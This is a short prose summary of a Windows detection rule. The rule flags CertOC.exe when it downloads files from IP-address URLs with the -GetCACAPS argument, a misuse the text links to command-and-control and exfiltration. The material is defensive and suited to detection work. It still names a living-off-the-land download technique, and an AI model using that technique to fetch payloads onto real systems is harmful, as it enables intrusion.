This detection rule monitors the execution of CertOC.exe on Windows systems to identify malicious file downloads from IP-based URLs. CertOC.exe is a legitimate utility often misused by attackers for command-and-control activities or file exfiltration. The rule is particularly focused on identifying instances where the command line indicates a download from a URL formatted with an IP address, as opposed to a domain name. The detection logic checks for specific criteria indicating usage of CertOC.exe along with command-line arguments typically used for downloading data, specifically `-GetCACAPS`. By monitoring these attributes, the rule helps in identifying potentially harmful activities that could compromise a system's security. Given the nature of files being downloaded from direct IP addresses, this rule aims to mitigate threats related to unauthorized data retrieval and enhance endpoint protection. The rule's high severity level indicates a strong likelihood of malicious action when triggered, warranting further investigation.